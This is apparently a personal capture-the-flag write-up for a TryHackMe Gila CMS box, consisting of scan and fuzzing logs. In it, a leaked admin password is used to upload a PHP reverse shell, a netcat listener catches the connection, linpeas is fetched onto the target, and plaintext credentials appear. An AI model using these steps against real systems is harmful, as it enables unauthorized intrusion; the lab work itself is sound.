CMesS
Can you root this Gila CMS box?
Flags
Start Machine
Please add MACHINE_IP cmess.thm to /etc/hosts
Please also note that this box does not require brute forcing!
Answer the questions below
┌──(witty㉿kali)-[~/bug_hunter/MyScripts]
└─$ tail /etc/hosts
ff02::2 ip6-allrouters
#10.10.188.193 lundc.lunar.eruca.com lundc lunar-LUNDC-CA lunar.eruca
#127.0.0.1 irc.cct
10.10.92.0 cdn.tryhackme.loc
10.10.97.54 external.pypi-server.loc
10.10.173.88 cybercrafted.thm admin.cybercrafted.thm store.cybercrafted.thm www.cybercrafted.thm
10.10.101.47 wekor.thm site.wekor.thm
10.10.105.35 cmess.thm
┌──(witty㉿kali)-[~/bug_hunter/MyScripts]
└─$ rustscan -a 10.10.105.35 --ulimit 5500 -b 65535 -- -A -Pn
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan
[~] The config file is expected to be at "/home/witty/.rustscan.toml"
[~] Automatically increasing ulimit value to 5500.
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
Open 10.10.105.35:22
Open 10.10.105.35:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-14 12:26 EDT
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:26
Completed NSE at 12:26, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:26
Completed NSE at 12:26, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:26
Completed NSE at 12:26, 0.00s elapsed
Initiating Connect Scan at 12:26
Scanning cmess.thm (10.10.105.35) [2 ports]
Discovered open port 22/tcp on 10.10.105.35
Discovered open port 80/tcp on 10.10.105.35
Completed Connect Scan at 12:26, 0.21s elapsed (2 total ports)
Initiating Service scan at 12:26
Scanning 2 services on cmess.thm (10.10.105.35)
Completed Service scan at 12:26, 6.81s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.105.35.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:26
Completed NSE at 12:26, 7.07s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:26
Completed NSE at 12:26, 1.70s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:26
Completed NSE at 12:26, 0.00s elapsed
Nmap scan report for cmess.thm (10.10.105.35)
Host is up, received user-set (0.21s latency).
Scanned at 2023-03-14 12:26:18 EDT for 16s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d9b652d3939a3850b4233bfd210c051f (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCvfxduhH7oHBPaAYuN66Mf6eL6AJVYqiFAh6Z0gBpD08k+pzxZDtbA3cdniBw3+DHe/uKizsF0vcAqoy8jHEXOOdsOmJEqYXjLJSayzjnPwFcuaVaKOjrlmWIKv6zwurudO9kJjylYksl0F/mRT6ou1+UtE2K7lDDiy4H3CkBZALJvA0q1CNc53sokAUsf5eEh8/t8oL+QWyVhtcbIcRcqUDZ68UcsTd7K7Q1+GbxNa3wftE0xKZ+63nZCVz7AFEfYF++glFsHj5VH2vF+dJMTkV0jB9hpouKPGYmxJK3DjHbHk5jN9KERahvqQhVTYSy2noh9CBuCYv7fE2DsuDIF
| 256 21c36e318b85228a6d72868fae64662b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGOVQ0bHJHx9Dpyf9yscggpEywarn6ZXqgKs1UidXeQqyC765WpF63FHmeFP10e8Vd3HTdT3d/T8Nk3Ojt8mbds=
| 256 5bb9757805d7ec43309617ffc6a86ced (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFUGmaB6zNbqDfDaG52mR3Ku2wYe1jZX/x57d94nxxkC
80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 3 disallowed entries
|_/src/ /themes/ /lib/
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-generator: Gila CMS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:26
Completed NSE at 12:26, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:26
Completed NSE at 12:26, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:26
Completed NSE at 12:26, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.14 seconds
┌──(witty㉿kali)-[~/bug_hunter/MyScripts]
└─$ wfuzz -u cmess.thm -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.cmess.thm" --hc 404
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
/home/witty/.local/lib/python3.11/site-packages/requests/__init__.py:89: RequestsDependencyWarning:urllib3 (1.26.15) or chardet (5.1.0) doesn't match a supported version!
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://cmess.thm/
Total requests: 114441
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000019: 200 30 L 104 W 934 Ch "dev"
000000014: 200 107 L 290 W 3898 Ch "autoconfig"
000000001: 200 107 L 290 W 3877 Ch "www"
000000003: 200 107 L 290 W 3877 Ch "ftp"
000000007: 200 107 L 290 W 3889 Ch "webdisk"
000000016: 200 107 L 290 W 3880 Ch "test"
000000018: 200 107 L 290 W 3880 Ch "blog"
000000015: 200 107 L 290 W 3874 Ch "ns"
000000017: 200 107 L 290 W 3871 Ch "m"
000000020: 200 107 L 290 W 3880 Ch "www2"
000000013: 200 107 L 290 W 3904 Ch "autodiscove
r"
000000005: 200 107 L 290 W 3889 Ch "webmail"
000000009: 200 107 L 290 W 3886 Ch "cpanel"
000000004: 200 107 L 290 W 3895 Ch "localhost"
000000011: 200 107 L 290 W 3877 Ch "ns1"
000000006: 200 107 L 290 W 3880 Ch "smtp"
000000002: 200 107 L 290 W 3880 Ch "mail"
000000012: 200 107 L 290 W 3877 Ch "ns2"
000000008: 200 107 L 290 W 3877 Ch "pop"
000000010: 200 107 L 290 W 3877 Ch "whm"
000000021: 200 107 L 290 W 3877 Ch "ns3"
000000024: 200 107 L 290 W 3883 Ch "admin"
000000028: 200 107 L 290 W 3880 Ch "imap"
000000031: 200 107 L 290 W 3886 Ch "mobile"
000000027: 200 107 L 290 W 3874 Ch "mx"
000000025: 200 107 L 290 W 3883 Ch "mail2"
000000029: 200 107 L 290 W 3877 Ch "old"
000000023: 200 107 L 290 W 3883 Ch "forum"
000000022: 200 107 L 290 W 3880 Ch "pop3"
000000026: 200 107 L 290 W 3877 Ch "vpn"
000000035: 200 107 L 290 W 3874 Ch "cp"
000000037: 200 107 L 290 W 3880 Ch "shop"
000000032: 200 107 L 290 W 3883 Ch "mysql"
000000043: 200 107 L 290 W 3883 Ch "lists"
000000040: 200 107 L 290 W 3877 Ch "ns4"
000000034: 200 107 L 290 W 3889 Ch "support"
000000038: 200 107 L 290 W 3880 Ch "demo"
000000033: 200 107 L 290 W 3880 Ch "beta"
000000030: 200 107 L 290 W 3877 Ch "new"
000000036: 200 107 L 290 W 3886 Ch "secure"
000000044: 200 107 L 290 W 3877 Ch "web"
000000059: 200 107 L 290 W 3895 Ch "www.forum"
000000045: 200 107 L 290 W 3880 Ch "www1"
000000060: 200 107 L 290 W 3892 Ch "www.test"
000000039: 200 107 L 290 W 3880 Ch "dns2"
000000047: 200 107 L 290 W 3880 Ch "news"
000000058: 200 107 L 290 W 3892 Ch "intranet"
000000042: 200 107 L 290 W 3886 Ch "static"
000000051: 200 107 L 290 W 3877 Ch "api"
000000041: 200 107 L 290 W 3880 Ch "dns1"
000000056: 200 107 L 290 W 3877 Ch "dns"
000000050: 200 107 L 290 W 3880 Ch "wiki"
000000055: 200 107 L 290 W 3886 Ch "backup"
000000048: 200 107 L 290 W 3886 Ch "portal"
000000054: 200 107 L 290 W 3892 Ch "www.blog"
000000046: 200 107 L 290 W 3877 Ch "img"
000000052: 200 107 L 290 W 3883 Ch "media"
000000053: 200 107 L 290 W 3886 Ch "images"
000000049: 200 107 L 290 W 3886 Ch "server"
000000057: 200 107 L 290 W 3877 Ch "sql"
^C /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...
Total time: 0
Processed Requests: 60
Filtered Requests: 0
Requests/sec.: 0
there are many subdomains let's use dev, server, sql, backup
┌──(witty㉿kali)-[~/bug_hunter/MyScripts]
└─$ tail /etc/hosts
ff02::2 ip6-allrouters
#10.10.188.193 lundc.lunar.eruca.com lundc lunar-LUNDC-CA lunar.eruca
#127.0.0.1 irc.cct
10.10.92.0 cdn.tryhackme.loc
10.10.97.54 external.pypi-server.loc
10.10.173.88 cybercrafted.thm admin.cybercrafted.thm store.cybercrafted.thm www.cybercrafted.thm
10.10.101.47 wekor.thm site.wekor.thm
10.10.105.35 cmess.thm dev.cmess.thm server.cmess.thm sql.cmess.thm backup.cmess.thm
if we don't find something interesting let's change it
http://dev.cmess.thm/
Development Log
andre@cmess.thm
Have you guys fixed the bug that was found on live?
support@cmess.thm
Hey Andre, We have managed to fix the misconfigured .htaccess file, we're hoping to patch it in the upcoming patch!
support@cmess.thm
Update! We have had to delay the patch due to unforeseen circumstances
andre@cmess.thm
That's ok, can you guys reset my password if you get a moment, I seem to be unable to get onto the admin panel.
support@cmess.thm
Your password has been reset. Here: KPFTN_f2yxe%
┌──(witty㉿kali)-[~/bug_hunter/MyScripts]
└─$ gobuster -t 64 dir -e -k -u http://cmess.thm -w /usr/share/dirb/wordlists/common.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://cmess.thm
[+] Method: GET
[+] Threads: 64
[+] Wordlist: /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2023/03/14 12:41:48 Starting gobuster in directory enumeration mode
===============================================================
http://cmess.thm/.htpasswd (Status: 403) [Size: 274]
http://cmess.thm/0 (Status: 200) [Size: 3851]
http://cmess.thm/01 (Status: 200) [Size: 4078]
http://cmess.thm/1 (Status: 200) [Size: 4078]
http://cmess.thm/1x1 (Status: 200) [Size: 4078]
http://cmess.thm/about (Status: 200) [Size: 3353]
http://cmess.thm/About (Status: 200) [Size: 3339]
http://cmess.thm/admin (Status: 200) [Size: 1580]
http://cmess.thm/.hta (Status: 403) [Size: 274]
http://cmess.thm/api (Status: 200) [Size: 0]
http://cmess.thm/assets (Status: 301) [Size: 318] [--> http://cmess.thm/assets/?url=assets]
http://cmess.thm/author (Status: 200) [Size: 3590]
http://cmess.thm/.htaccess (Status: 403) [Size: 274]
http://cmess.thm/blog (Status: 200) [Size: 3851]
http://cmess.thm/category (Status: 200) [Size: 3862]
http://cmess.thm/cm (Status: 500) [Size: 0]
Progress: 1213 / 4615 (26.28%)^C
[!] Keyboard interrupt detected, terminating.
[ERROR] 2023/03/14 12:41:58 [!] context canceled
===============================================================
2023/03/14 12:41:58 Finished
===============================================================
http://cmess.thm/admin
andre@cmess.thm : KPFTN_f2yxe%
login
go to content > file manager > upload revshell
config.php
<?php
$GLOBALS['config'] = array (
'db' =>
array (
'host' => 'localhost',
'user' => 'root',
'pass' => 'r0otus3rpassw0rd',
'name' => 'gila',
),
'permissions' =>
array (
1 =>
array (
0 => 'admin',
1 => 'admin_user',
2 => 'admin_userrole',
),
),
'packages' =>
array (
0 => 'blog',
),
'base' => 'http://cmess.thm/gila/',
'theme' => 'gila-blog',
'title' => 'Gila CMS',
'slogan' => 'An awesome website!',
'default-controller' => 'blog',
'timezone' => 'America/Mexico_City',
'ssl' => '',
'env' => 'pro',
'check4updates' => 1,
'language' => 'en',
'admin_email' => 'andre@cmess.thm',
'rewrite' => true,
);
go to assets and there'll be the revshell
http://cmess.thm/assets/payload_ivan.php
┌──(witty㉿kali)-[~/bug_hunter/MyScripts]
└─$ rlwrap nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.8.19.103] from (UNKNOWN) [10.10.105.35] 48480
SOCKET: Shell has connected! PID: 2496
python3 -c 'import pty;pty.spawn("/bin/bash")'
let's upload linpeas
──(witty㉿kali)-[~/Downloads]
└─$ python3 -m http.server 1234
Serving HTTP on 0.0.0.0 port 1234 (http://0.0.0.0:1234/) ...
10.10.105.35 - - [14/Mar/2023 12:50:03] "GET /linpeas.sh HTTP/1.1" 200 -
www-data@cmess:/var/www/html/assets$ cd /tmp
cd /tmp
www-data@cmess:/tmp$ wget http://10.8.19.103:1234/linpeas.sh
wget http://10.8.19.103:1234/linpeas.sh
--2023-03-14 09:50:03-- http://10.8.19.103:1234/linpeas.sh
Connecting to 10.8.19.103:1234... connected.
HTTP request sent, awaiting response... 200 OK
Length: 828098 (809K) [text/x-sh]
Saving to: 'linpeas.sh'
2023-03-14 09:50:08 (203 KB/s) - 'linpeas.sh' saved [828098/828098]
www-data@cmess:/tmp$ chmod +x linpeas.sh
chmod +x linpeas.sh
www-data@cmess:/tmp$ ./linpeas.sh
▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄ ▄▄▄ ▄▄▄▄▄ ▄▄▄
▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄ ▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
▀▀▀▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▀▀
▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀
/---------------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------------|
| Get the latest version : https://github.com/sponsors/carlospolop |
| Follow on Twitter : @carlospolopm |
| Respect on HTB : SirBroccoli |
|---------------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------------/
linpeas-ng by carlospolop
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist
LEGEND:
RED/YELLOW: 95% a PE vector
RED: You should take a look to it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMagenta: Your username
Starting linpeas. Caching Writable Folders...
╔═══════════════════╗
═══════════════════════════════╣ Basic information ╠═══════════════════════════════
╚═══════════════════╝
OS: Linux version 4.4.0-142-generic (buildd@lgw01-amd64-033) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.10) ) #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019
User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Hostname: cmess
Writable folder: /dev/shm
[+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /bin/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan ports, and forward ports. Learn more with -h)
[+] /bin/nc is available for network discovery & port scanning (linpeas can discover hosts and scan ports, learn more with -h)
Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE
╔════════════════════╗
══════════════════════════════╣ System Information ╠══════════════════════════════
╚════════════════════╝
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 4.4.0-142-generic (buildd@lgw01-amd64-033) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.10) ) #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019
Distributor ID: Ubuntu
Description: Ubuntu 16.04.6 LTS
Release: 16.04
Codename: xenial
╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.16
╔══════════╣ CVEs Check
Potentially Vulnerable to CVE-2022-2588
╔══════════╣ PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
New path exported: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
╔══════════╣ Date & uptime
Tue Mar 14 10:00:25 PDT 2023
10:00:25 up 37 min, 0 users, load average: 2.53, 2.05, 1.55
╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)
disk
╔══════════╣ Unmounted file-system?
╚ Check if you can mount umounted devices
UUID=5c88f34b-fd0f-4ec2-8c34-04067bb27ec4 / ext4 errors=remount-ro 0 1
UUID=e33d49cc-1f73-4faf-b2f2-fd4f6c601c58 none swap sw 0 0
╔══════════╣ Environment
╚ Any private information inside environment variables?
HISTFILESIZE=0
SHLVL=1
OLDPWD=/var/www/html/assets
APACHE_RUN_DIR=/var/run/apache2
APACHE_PID_FILE=/var/run/apache2/apache2.pid
_=./linpeas.sh
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
APACHE_LOCK_DIR=/var/lock/apache2
LANG=C
HISTSIZE=0
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data
APACHE_LOG_DIR=/var/log/apache2
PWD=/tmp
HISTFILE=/dev/null
╔══════════╣ Searching Signature verification failed in dmesg
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#dmesg-signature-verification-failed
dmesg Not Found
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2017-16995] eBPF_verifier
Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
Exposure: highly probable
Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic}
Download URL: https://www.exploit-db.com/download/45010
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
[+] [CVE-2016-5195] dirtycow
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]
Download URL: https://www.exploit-db.com/download/40611
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2016-5195] dirtycow 2
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},[ ubuntu=16.04 ]{kernel:4.4.0-21-generic}
Download URL: https://www.exploit-db.com/download/40839
ext-url: https://www.exploit-db.com/download/40847
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2021-3156] sudo Baron Samedit 2
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: probable
Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2017-7308] af_packet
Details: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
Exposure: probable
Tags: [ ubuntu=16.04 ]{kernel:4.8.0-(34|36|39|41|42|44|45)-generic}
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-7308/poc.c
Comments: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels
[+] [CVE-2017-6074] dccp
Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
Exposure: probable
Tags: [ ubuntu=(14.04|16.04) ]{kernel:4.4.0-62-generic}
Download URL: https://www.exploit-db.com/download/41458
Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass
[+] [CVE-2017-1000112] NETIF_F_UFO
Details: http://www.openwall.com/lists/oss-security/2017/08/13/1
Exposure: probable
Tags: ubuntu=14.04{kernel:4.4.0-*},[ ubuntu=16.04 ]{kernel:4.8.0-*}
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112/poc.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-1000112/poc.c
Comments: CAP_NET_ADMIN cap or CONFIG_USER_NS=y needed. SMEP/KASLR bypass included. Modified version at 'ext-url' adds support for additional distros/kernels
[+] [CVE-2016-8655] chocobo_root
Details: http://www.openwall.com/lists/oss-security/2016/12/06/1
Exposure: probable
Tags: [ ubuntu=(14.04|16.04) ]{kernel:4.4.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic}
Download URL: https://www.exploit-db.com/download/40871
Comments: CAP_NET_RAW capability is needed OR CONFIG_USER_NS=y needs to be enabled
[+] [CVE-2016-4557] double-fdput()
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=808
Exposure: probable
Tags: [ ubuntu=16.04 ]{kernel:4.4.0-21-generic}
Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39772.zip
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
Exposure: less probable
Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2022-2586] nft_object UAF
Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
Exposure: less probable
Tags: ubuntu=(20.04){kernel:5.12.13}
Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2021-3156] sudo Baron Samedit
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: less probable
Tags: mint=19,ubuntu=18|20, debian=10
Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
[+] [CVE-2019-18634] sudo pwfeedback
Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
Exposure: less probable
Tags: mint=19
Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
Comments: sudo configuration requires pwfeedback to be enabled.
[+] [CVE-2019-15666] XFRM_UAF
Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
Exposure: less probable
Download URL:
Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled
[+] [CVE-2018-1000001] RationalLove
Details: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/
Exposure: less probable
Tags: debian=9{libc6:2.24-11+deb9u1},ubuntu=16.04.3{libc6:2.23-0ubuntu9}
Download URL: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/RationalLove.c
Comments: kernel.unprivileged_userns_clone=1 required
[+] [CVE-2017-1000366,CVE-2017-1000379] linux_ldso_hwcap_64
Details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
Exposure: less probable
Tags: debian=7.7|8.5|9.0,ubuntu=14.04.2|16.04.2|17.04,fedora=22|25,centos=7.3.1611
Download URL: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_hwcap_64.c
Comments: Uses "Stack Clash" technique, works against most SUID-root binaries
[+] [CVE-2017-1000253] PIE_stack_corruption
Details: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.txt
Exposure: less probable
Tags: RHEL=6,RHEL=7{kernel:3.10.0-514.21.2|3.10.0-514.26.1}
Download URL: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.c
[+] [CVE-2016-9793] SO_{SND|RCV}BUFFORCE
Details: https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-9793
Exposure: less probable
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-9793/poc.c
Comments: CAP_NET_ADMIN caps OR CONFIG_USER_NS=y needed. No SMEP/SMAP/KASLR bypass included. Tested in QEMU only
[+] [CVE-2016-2384] usb-midi
Details: https://xairy.github.io/blog/2016/cve-2016-2384
Exposure: less probable
Tags: ubuntu=14.04,fedora=22
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c
Comments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user
[+] [CVE-2016-0728] keyring
Details: http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/40003
